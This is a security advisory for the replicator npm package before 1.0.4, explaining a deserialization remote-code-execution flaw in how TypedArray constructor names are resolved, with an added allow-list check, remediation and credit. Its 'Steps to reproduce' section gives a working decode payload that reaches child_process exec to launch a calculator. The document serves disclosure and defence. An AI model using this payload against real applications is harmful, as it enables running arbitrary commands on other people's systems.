Summary

Affected versions of the replicator npm package are vulnerable to a deserialization RCE via TypedArray objects. replicator does not verify the constructor name supplied when deserializing a `[[TypedArray]]` entry, which lets an attacker instantiate arbitrary objects instead of only typed arrays.
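The root cause is that the `ctorName` field is resolved to a constructor without checking that it names a typed array. The following is an added example (not replicator's own code) showing the shape of the missing check: an allow-list lookup for the constructor, plus a screen that walks a parsed payload of the form shown below and reports any `[[TypedArray]]` entry whose `ctorName` is not a typed-array constructor. The field names `@t`, `data`, `ctorName` and `arr` follow the payload in this advisory; the allow-list is assumed to be the standard ECMAScript typed-array constructors.

```javascript
// Added example: allow-list handling for "[[TypedArray]]" entries in a
// replicator-style payload. Not replicator's code; field names follow the
// advisory's payload, the constructor list is an assumption (ES typed arrays).
const SAFE_TYPED_ARRAY_CTORS = new Set([
  'Int8Array', 'Uint8Array', 'Uint8ClampedArray', 'Int16Array', 'Uint16Array',
  'Int32Array', 'Uint32Array', 'Float32Array', 'Float64Array',
  'BigInt64Array', 'BigUint64Array',
]);

// Returns the constructor only when the name is on the allow-list. The point is
// never to resolve an arbitrary ctorName against globalThis, which is the
// behaviour the summary describes.
function resolveTypedArrayCtor(ctorName) {
  if (typeof ctorName !== 'string' || !SAFE_TYPED_ARRAY_CTORS.has(ctorName)) {
    throw new TypeError(`refusing non-typed-array ctorName: ${String(ctorName)}`);
  }
  return globalThis[ctorName];
}

// Walks a parsed (JSON.parse'd) payload and collects every ctorName that the
// allow-list would reject, so untrusted input can be screened before decoding.
// Nested entries (a TypedArray inside another's "arr") are found as well.
function findUnsafeTypedArrayCtors(node, found = []) {
  if (Array.isArray(node)) {
    for (const item of node) findUnsafeTypedArrayCtors(item, found);
  } else if (node && typeof node === 'object') {
    if (node['@t'] === '[[TypedArray]]' && node.data && typeof node.data === 'object') {
      const name = node.data.ctorName;
      if (!SAFE_TYPED_ARRAY_CTORS.has(name)) found.push(String(name));
    }
    for (const value of Object.values(node)) findUnsafeTypedArrayCtors(value, found);
  }
  return found;
}

// Constructed sample inputs: one benign Uint8Array entry and one entry naming a
// constructor that is not a typed array (no command payload, just the shape).
const benign = [{ '@t': '[[TypedArray]]', data: { ctorName: 'Uint8Array', arr: [1, 2, 3] } }];
const suspicious = [{ '@t': '[[TypedArray]]', data: { ctorName: 'Function', arr: 'return 1' } }];

console.log(findUnsafeTypedArrayCtors(benign));      // []
console.log(findUnsafeTypedArrayCtors(suspicious));  // [ 'Function' ]
```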

Product

replicator before 1.0.4.

Impact

If untrusted data is deserialized, an attacker could achieve RCE.

Steps to reproduce

replicator.decode('[{"@t":"[[TypedArray]]","data":{"ctorName":"setTimeout","arr":{"@t":"[[TypedArray]]","data":{"ctorName":"Function","arr":"process.mainModule.require(\'child_process\').exec(\'calc\');"}}}}]')

Expected result:

The command passed to the exec function is run; in this case the payload targets a Windows machine, so a calculator pops up.

Remediation

Update the replicator dependency to 1.0.4 or above.

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. Pull request
  2. Issue
  3. Commit
  4. Blog